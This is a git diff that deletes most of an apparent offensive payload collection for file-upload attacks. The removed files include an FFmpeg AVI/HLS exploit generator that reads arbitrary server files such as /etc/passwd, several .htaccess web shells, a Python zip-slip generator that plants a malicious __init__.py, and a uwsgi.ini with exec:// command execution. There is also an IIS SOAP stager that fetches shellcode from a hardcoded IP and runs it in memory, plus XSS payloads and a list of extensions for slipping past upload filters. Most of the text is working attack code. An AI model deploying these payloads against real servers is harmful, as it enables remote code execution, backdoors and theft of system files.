Ffmpeg HLS/README.md deleted file mode 100644 index 9d33035..0000000 --- a/Upload Insecure Files/CVE Ffmpeg HLS/README.md +++ /dev/null @@ -1,38 +0,0 @@ -# FFmpeg HLS vulnerability -FFmpeg is an open source software used for processing audio and video formats. You can use a malicious HLS playlist inside an AVI video to read arbitrary files. - -## Exploits -``` -1. `./gen_xbin_avi.py file:// file_read.avi` -2. Upload `file_read.avi` to some website that processes videofiles -3. (on server side, done by the videoservice) `ffmpeg -i file_read.avi output.mp4` -4. Click "Play" in the videoservice. -5. If you are lucky, you'll the content of `` from the server. -``` - -## How it works (Explanations from neex - Hackerone links) -the script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this: -``` -#EXTM3U -#EXT-X-MEDIA-SEQUENCE:0 -#EXTINF:1.0 -GOD.txt -#EXTINF:1.0 -/etc/passwd -#EXT-X-ENDLIST -``` -To process a playlist ffmpeg concatenates all segments and processes it as single file. -To determine the type of this file FFmpeg uses the first segment of the playlist. -FFmpeg processes .txt files in a special way. It tries to show a screen capture of a tty printing this file. - -So, the playlist above will be processed as follows: -FFmpeg sees #EXTM3U signature inside GAB2 chunk and determines file type as HLS playlist. -The file GOD.txt doesn't even exist, but it's name is enough for FFmpeg to detect file type as .txt. -FFmpeg concatenates the contents of all segments of the playlist. As only one of two segments actually exists, the result of concatenation is just the contents of the file we want to retrieve. -Because the type of this concatenation is .txt, FFmpeg draws a tty that prints the file. - -## Thanks to -* [Hackerone - Local File Disclosure via ffmpeg @sxcurity](https://hackerone.com/reports/242831) -* [Hackerone - Another local file disclosure via ffmpeg](https://hackerone.com/reports/243470) -* [PHDays - Attacks on video converters:a year later, Emil Lerner, Pavel Cheremushkin](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p) -* [Script by @neex](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) diff --git a/Upload Insecure Files/CVE Ffmpeg HLS/gen_avi_bypass.py b/Upload Insecure Files/CVE Ffmpeg HLS/gen_avi_bypass.py deleted file mode 100644 index 2aea429..0000000 --- a/Upload Insecure Files/CVE Ffmpeg HLS/gen_avi_bypass.py +++ /dev/null @@ -1,38 +0,0 @@ -import struct -import argparse - -AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi" - - -def make_txt_packet(content, fake_packets=50, fake_packet_len=200): - content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content - packet = b'00tx' + struct.pack(' 0: - packet_size -= 16 - assert packet_size > 0 - part_size = min(packet_size, 64) - packet_size -= part_size - result.append(echo_block(gen_xbin_packet_header(part_size))) - result.append( - EXTERNAL_REFERENCE_PLAYLIST.format( - size=part_size, - offset=offset, - filename=filename)) - offset += part_size - return ''.join(result), offset - - -def gen_xbin_playlist(filename_to_read): - pls = [echo_block(XBIN_HEADER)] - next_delta = 5 - for max_offs, filename in ( - (5000, filename_to_read), (500, "file:///dev/zero")): - offset = 0 - while offset < max_offs: - for _ in range(10): - pls_part, new_offset = gen_xbin_packet_playlist( - filename, offset, 0xf0 - next_delta) - pls.append(pls_part) - next_delta = 0 - offset = new_offset - pls.append(SYNC) - return FULL_PLAYLIST.format(content=''.join(pls), rand=''.join( - random.choice(string.ascii_lowercase) for i in range(30))) - - -if __name__ == "__main__": - parser = argparse.ArgumentParser('AVI+M3U+XBIN ffmpeg exploit generator') - parser.add_argument( - 'filename', - help='filename to be read from the server (prefix it with "file://")') - parser.add_argument('output_avi', help='where to save the avi') - args = parser.parse_args() - assert '://' in args.filename, "ffmpeg needs explicit proto (forgot file://?)" - content = gen_xbin_playlist(args.filename) - avi = make_playlist_avi(content) - output_name = args.output_avi - - with open(output_name, 'wb') as f: - f.write(avi) diff --git a/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd.avi b/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd.avi deleted file mode 100644 index 4d20637..0000000 Binary files a/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd.avi and /dev/null differ diff --git a/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd_bypass.mp4 b/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd_bypass.mp4 deleted file mode 100644 index 01a51ce..0000000 Binary files a/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd_bypass.mp4 and /dev/null differ diff --git a/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow.avi b/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow.avi deleted file mode 100644 index c251c2a..0000000 Binary files a/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow.avi and /dev/null differ diff --git a/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow_bypass.mp4 b/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow_bypass.mp4 deleted file mode 100644 index 41a468a..0000000 Binary files a/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow_bypass.mp4 and /dev/null differ diff --git a/Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip b/Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip deleted file mode 100644 index 7d4e2a9..0000000 Binary files a/Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip and /dev/null differ diff --git a/Upload Insecure Files/CVE ZIP Symbolic Link/generate.sh b/Upload Insecure Files/CVE ZIP Symbolic Link/generate.sh deleted file mode 100644 index cefdd26..0000000 --- a/Upload Insecure Files/CVE ZIP Symbolic Link/generate.sh +++ /dev/null @@ -1,2 +0,0 @@ -ln -s /etc/passwd link -zip --symlinks test.zip link diff --git a/Upload Insecure Files/CVE ZIP Symbolic Link/passwd b/Upload Insecure Files/CVE ZIP Symbolic Link/passwd deleted file mode 100644 index 3594e94..0000000 --- a/Upload Insecure Files/CVE ZIP Symbolic Link/passwd +++ /dev/null @@ -1 +0,0 @@ -/etc/passwd \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess deleted file mode 100644 index 9abc36b..0000000 --- a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess +++ /dev/null @@ -1,14 +0,0 @@ -# Self contained .htaccess web shell - Part of the htshell project -# Written by Wireghoul - http://www.justanotherhacker.com - -# Override default deny rule to make .htaccess file accessible over web - -Order allow,deny -Allow from all - - -# Make .htaccess file be interpreted as php file. This occur after apache has interpreted -# the apache directoves from the .htaccess file -AddType application/x-httpd-php .htaccess - -###### SHELL ###### &1"); ?>###### LLEHS ###### diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo deleted file mode 100644 index 97be883..0000000 --- a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo +++ /dev/null @@ -1,5 +0,0 @@ -AddType application/x-httpd-php .htaccess -# -SetHandler server-status -SetHandler server-info - diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files deleted file mode 100644 index 64b38fb..0000000 --- a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files +++ /dev/null @@ -1 +0,0 @@ -AddType application/x-httpd-php .rce \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell deleted file mode 100644 index 0b3b068..0000000 --- a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell +++ /dev/null @@ -1,23 +0,0 @@ -# htaccess backdoor shell -# this is relatively stealthy compared to a typical webshell - -# overriding deny rule -# making htaccess accessible from the internet -# without this you'll get a HTTP 403 - -Require all granted -Order allow,deny -Allow from all - - -# Make the server treat .htaccess file as .php file -AddType application/x-httpd-php .htaccess - -# - -# To execute commands you would navigate to: -# http://vulnerable.com/.htaccess?cmd=YourCommand - -# If system(); isnt working then try other syscalls -# e.g. passthru(); shell_exec(); etc -# If you still cant execute syscalls, try bypassing php.ini via htaccess diff --git a/Upload Insecure Files/Configuration Apache .htaccess/README.md b/Upload Insecure Files/Configuration Apache .htaccess/README.md deleted file mode 100644 index a340e91..0000000 --- a/Upload Insecure Files/Configuration Apache .htaccess/README.md +++ /dev/null @@ -1,71 +0,0 @@ -# .htaccess upload - -Uploading an .htaccess file to override Apache rule and execute PHP. -"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded." - -Self contained .htaccess web shell - -```python -# Self contained .htaccess web shell - Part of the htshell project -# Written by Wireghoul - http://www.justanotherhacker.com - -# Override default deny rule to make .htaccess file accessible over web - -Order allow,deny -Allow from all - - -# Make .htaccess file be interpreted as php file. This occur after apache has interpreted -# the apache directoves from the .htaccess file -AddType application/x-httpd-php .htaccess -``` - -```php -###### SHELL ###### -&1"); ?> -``` - -# .htaccess simple php - -Upload an .htaccess with : `AddType application/x-httpd-php .rce` -Then upload any file with `.rce` extension. - -# .htaccess upload as image - -If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. - -[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot. - -```python -# create valid .htaccess/xbm image - -width = 50 -height = 50 -payload = '# .htaccess file' - -with open('.htaccess', 'w') as htaccess: - htaccess.write('#define test_width %d\n' % (width, )) - htaccess.write('#define test_height %d\n' % (height, )) - htaccess.write(payload) -``` -or -```python -# create valid .htaccess/wbmp image - -type_header = b'\x00' -fixed_header = b'\x00' -width = b'50' -height = b'50' -payload = b'# .htaccess file' - -with open('.htaccess', 'wb') as htaccess: - htaccess.write(type_header + fixed_header + width + height) - htaccess.write(b'\n') - htaccess.write(payload) -``` - -## Thanks to - -* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) -* [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) -* [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster) diff --git a/Upload Insecure Files/Configuration Busybox httpd.conf/README.md b/Upload Insecure Files/Configuration Busybox httpd.conf/README.md deleted file mode 100644 index 67f71a6..0000000 --- a/Upload Insecure Files/Configuration Busybox httpd.conf/README.md +++ /dev/null @@ -1,11 +0,0 @@ -If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter. - -Details from Busybox httpd.c - -https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60 - -> *.php:/path/php # run xxx.php through an interpreter` - -> If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration. - -Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :) diff --git a/Upload Insecure Files/Configuration Busybox httpd.conf/httpd.conf b/Upload Insecure Files/Configuration Busybox httpd.conf/httpd.conf deleted file mode 100644 index da4bd65..0000000 --- a/Upload Insecure Files/Configuration Busybox httpd.conf/httpd.conf +++ /dev/null @@ -1 +0,0 @@ -*.sh:/bin/sh diff --git a/Upload Insecure Files/Configuration Busybox httpd.conf/shellymcshellface.sh b/Upload Insecure Files/Configuration Busybox httpd.conf/shellymcshellface.sh deleted file mode 100644 index 0282e4b..0000000 --- a/Upload Insecure Files/Configuration Busybox httpd.conf/shellymcshellface.sh +++ /dev/null @@ -1,3 +0,0 @@ -echo "Content-type: text/html" -echo "" -echo `id` diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config deleted file mode 100644 index 6e02a37..0000000 --- a/Upload Insecure Files/Configuration IIS web.config/web.config +++ /dev/null @@ -1,65 +0,0 @@ - - - - - - - - - - - - - - - - - - - diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip deleted file mode 100644 index 69f89c5..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip deleted file mode 100644 index 4eef395..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip deleted file mode 100644 index 61e0f11..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip deleted file mode 100644 index 7e7f015..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py b/Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py deleted file mode 100644 index 2018f15..0000000 --- a/Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py +++ /dev/null @@ -1,19 +0,0 @@ -# Generating "evil" zip file -# Based on the work of Ajin Abraham -# Vuln website : https://github.com/ajinabraham/bad_python_extract -# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution - -# Warning 1: need a restart from the server OR debug=True -# Warning 2: you won't get the output of the command (blind rce) -import zipfile - -directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"] -for d in directories: - name = "python-"+d+"-__init__.py.zip" - zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED) - zipf.close() - z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py") - z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+ - z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');") - z_info.external_attr = 0o777 << 16 - z_file.close() diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip deleted file mode 100644 index 5f67036..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip deleted file mode 100644 index 75c2e0f..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip deleted file mode 100644 index 47e5e5e..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip deleted file mode 100644 index a2bbe3b..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip deleted file mode 100644 index 4ea8d06..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip deleted file mode 100644 index ebca369..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip deleted file mode 100644 index 13b89ed..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip deleted file mode 100644 index 3622020..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip b/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip deleted file mode 100644 index 29ed3a0..0000000 Binary files a/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip and /dev/null differ diff --git a/Upload Insecure Files/Configuration uwsgi.ini/README.md b/Upload Insecure Files/Configuration uwsgi.ini/README.md deleted file mode 100644 index 0407a88..0000000 --- a/Upload Insecure Files/Configuration uwsgi.ini/README.md +++ /dev/null @@ -1,32 +0,0 @@ -# uWSGI configuration file - -uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed: - -Example of malicious uwsgi.ini file: - -```ini -[uwsgi] -; read from a symbol -foo = @(sym://uwsgi_funny_function) -; read from binary appended data -bar = @(data://[REDACTED]) -; read from http -test = @(http://[REDACTED]) -; read from a file descriptor -content = @(fd://[REDACTED]) -; read from a process stdout -body = @(exec://whoami) -; call a function returning a char * -characters = @(call://uwsgi_func) -``` - -When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed. - -## uWSGI lax parsing - -The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...). - -## Thanks to - -* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) - diff --git a/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini b/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini deleted file mode 100644 index 7301b4c..0000000 --- a/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini +++ /dev/null @@ -1,13 +0,0 @@ -[uwsgi] -; read from a symbol -foo = @(sym://uwsgi_funny_function) -; read from binary appended data -bar = @(data://[REDACTED]) -; read from http -test = @(http://[REDACTED]) -; read from a file descriptor -content = @(fd://[REDACTED]) -; read from a process stdout -body = @(exec://whoami) -; call a function returning a char * -characters = @(call://uwsgi_func) \ No newline at end of file diff --git a/Upload Insecure Files/Extension ASP/shell.soap b/Upload Insecure Files/Extension ASP/shell.soap deleted file mode 100644 index dcac007..0000000 --- a/Upload Insecure Files/Extension ASP/shell.soap +++ /dev/null @@ -1,55 +0,0 @@ -<%@ WebService Language="C#" class="SoapStager"%> -using System; -using System.IO; -using System.Web; -using System.Web.Services; -using System.Net; -using System.Net.NetworkInformation; -using System.Net.Security; - -// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap -// https://github.com/0xbad53c/webshells/tree/main/iis - -[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")] -[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] -public class SoapStager : MarshalByRefObject -{ - private static Int32 MEM_COMMIT=0x1000; - private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; - - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); - - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); - - - [System.ComponentModel.ToolboxItem(false)] - [WebMethod] - public string loadStage() - { - string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode - byte[] rzjUFlLZh; - - IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy; - defaultWebProxy.Credentials = CredentialCache.DefaultCredentials; - - // in case of HTTPS - using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy }) - { - ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; - ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; }); - webClient.UseDefaultCredentials = true; - rzjUFlLZh = webClient.DownloadData(Url); - } - - - // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion - IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); - System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length); - IntPtr owlqRoQI_ms = IntPtr.Zero; - IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms); - - return "finished"; - } -} \ No newline at end of file diff --git a/Upload Insecure Files/Extension ASP/shell.xamlx b/Upload Insecure Files/Extension ASP/shell.xamlx deleted file mode 100644 index ab0da0f..0000000 --- a/Upload Insecure Files/Extension ASP/shell.xamlx +++ /dev/null @@ -1,16 +0,0 @@ - - - - - - - - - - [System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()] - - - - - - \ No newline at end of file diff --git a/Upload Insecure Files/Extension Flash/README.md b/Upload Insecure Files/Extension Flash/README.md deleted file mode 100644 index bd5e8b5..0000000 --- a/Upload Insecure Files/Extension Flash/README.md +++ /dev/null @@ -1,12 +0,0 @@ -### XSS via SWF - -As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. -This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. - -```powershell -Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); - -IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} - -IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); -``` \ No newline at end of file diff --git a/Upload Insecure Files/Extension Flash/xss.swf b/Upload Insecure Files/Extension Flash/xss.swf deleted file mode 100644 index da8598b..0000000 Binary files a/Upload Insecure Files/Extension Flash/xss.swf and /dev/null differ diff --git a/Upload Insecure Files/Extension Flash/xssproject.swf b/Upload Insecure Files/Extension Flash/xssproject.swf deleted file mode 100644 index a0e7b36..0000000 Binary files a/Upload Insecure Files/Extension Flash/xssproject.swf and /dev/null differ diff --git a/Upload Insecure Files/Extension HTML/xss.html b/Upload Insecure Files/Extension HTML/xss.html deleted file mode 100644 index 48d8f22..0000000 --- a/Upload Insecure Files/Extension HTML/xss.html +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PDF JS/poc.js b/Upload Insecure Files/Extension PDF JS/poc.js deleted file mode 100644 index caf0e52..0000000 --- a/Upload Insecure Files/Extension PDF JS/poc.js +++ /dev/null @@ -1 +0,0 @@ -app.alert("XSS") \ No newline at end of file diff --git a/Upload Insecure Files/Extension PDF JS/poc.py b/Upload Insecure Files/Extension PDF JS/poc.py deleted file mode 100644 index 40cdee8..0000000 --- a/Upload Insecure Files/Extension PDF JS/poc.py +++ /dev/null @@ -1,108 +0,0 @@ -# FROM https://github.com/osnr/horrifying-pdf-experiments -import sys - -from pdfrw import PdfWriter -from pdfrw.objects.pdfname import PdfName -from pdfrw.objects.pdfstring import PdfString -from pdfrw.objects.pdfdict import PdfDict -from pdfrw.objects.pdfarray import PdfArray - -def make_js_action(js): - action = PdfDict() - action.S = PdfName.JavaScript - action.JS = js - return action - -def make_field(name, x, y, width, height, r, g, b, value=""): - annot = PdfDict() - annot.Type = PdfName.Annot - annot.Subtype = PdfName.Widget - annot.FT = PdfName.Tx - annot.Ff = 2 - annot.Rect = PdfArray([x, y, x + width, y + height]) - annot.MaxLen = 160 - annot.T = PdfString.encode(name) - annot.V = PdfString.encode(value) - - # Default appearance stream: can be arbitrary PDF XObject or - # something. Very general. - annot.AP = PdfDict() - - ap = annot.AP.N = PdfDict() - ap.Type = PdfName.XObject - ap.Subtype = PdfName.Form - ap.FormType = 1 - ap.BBox = PdfArray([0, 0, width, height]) - ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0]) - ap.stream = """ -%f %f %f rg -0.0 0.0 %f %f re f -""" % (r, g, b, width, height) - - # It took me a while to figure this out. See PDF spec: - # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641 - - # Basically, the appearance stream we just specified doesn't - # follow the field rect if it gets changed in JS (at least not in - # Chrome). - - # But this simple MK field here, with border/color - # characteristics, _does_ follow those movements and resizes, so - # we can get moving colored rectangles this way. - annot.MK = PdfDict() - annot.MK.BG = PdfArray([r, g, b]) - - return annot - -def make_page(fields, script): - page = PdfDict() - page.Type = PdfName.Page - - page.Resources = PdfDict() - page.Resources.Font = PdfDict() - page.Resources.Font.F1 = PdfDict() - page.Resources.Font.F1.Type = PdfName.Font - page.Resources.Font.F1.Subtype = PdfName.Type1 - page.Resources.Font.F1.BaseFont = PdfName.Helvetica - - page.MediaBox = PdfArray([0, 0, 612, 792]) - - page.Contents = PdfDict() - page.Contents.stream = """ -BT -/F1 24 Tf -ET - """ - - annots = fields - - page.AA = PdfDict() - # You probably should just wrap each JS action with a try/catch, - # because Chrome does no error reporting or even logging otherwise; - # you just get a silent failure. - page.AA.O = make_js_action(""" -try { - %s -} catch (e) { - app.alert(e.message); -} - """ % (script)) - - page.Annots = PdfArray(annots) - return page - -if len(sys.argv) > 1: - js_file = open(sys.argv[1], 'r') - - fields = [] - for line in js_file: - if not line.startswith('/// '): break - pieces = line.split() - params = [pieces[1]] + [float(token) for token in pieces[2:]] - fields.append(make_field(*params)) - - js_file.seek(0) - - out = PdfWriter() - out.addpage(make_page(fields, js_file.read())) - out.write('result.pdf') \ No newline at end of file diff --git a/Upload Insecure Files/Extension PDF JS/result.pdf b/Upload Insecure Files/Extension PDF JS/result.pdf deleted file mode 100644 index d5bd60a..0000000 --- a/Upload Insecure Files/Extension PDF JS/result.pdf +++ /dev/null @@ -1,48 +0,0 @@ -%PDF-1.3 -% -1 0 obj -<> -endobj -2 0 obj -<> -endobj -3 0 obj -<>>> - /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R - /Resources - <>>>>> - /Type /Page>> -endobj -4 0 obj -<> -stream - -BT -/F1 24 Tf -ET - -endstream -endobj -xref -0 5 -0000000000 65535 f -0000000015 00000 n -0000000062 00000 n -0000000117 00000 n -0000000424 00000 n -trailer - -<> -startxref -493 -%%EOF diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst deleted file mode 100644 index acb75fe..0000000 --- a/Upload Insecure Files/Extension PHP/extensions.lst +++ /dev/null @@ -1,21 +0,0 @@ -.jpeg.php -.jpg.php -.png.php -.php -.php3 -.php4 -.php5 -.php7 -.php8 -.pht -.phar -.phpt -.pgif -.phtml -.phtm -.php%00.gif -.php\x00.gif -.php%00.png -.php\x00.png -.php%00.jpg -.php\x00.jpg diff --git a/Upload Insecure Files/Extension PHP/phpinfo.jpg.php b/Upload Insecure Files/Extension PHP/phpinfo.jpg.php deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.jpg.php +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.phar b/Upload Insecure Files/Extension PHP/phpinfo.phar deleted file mode 100644 index 147cebc..0000000 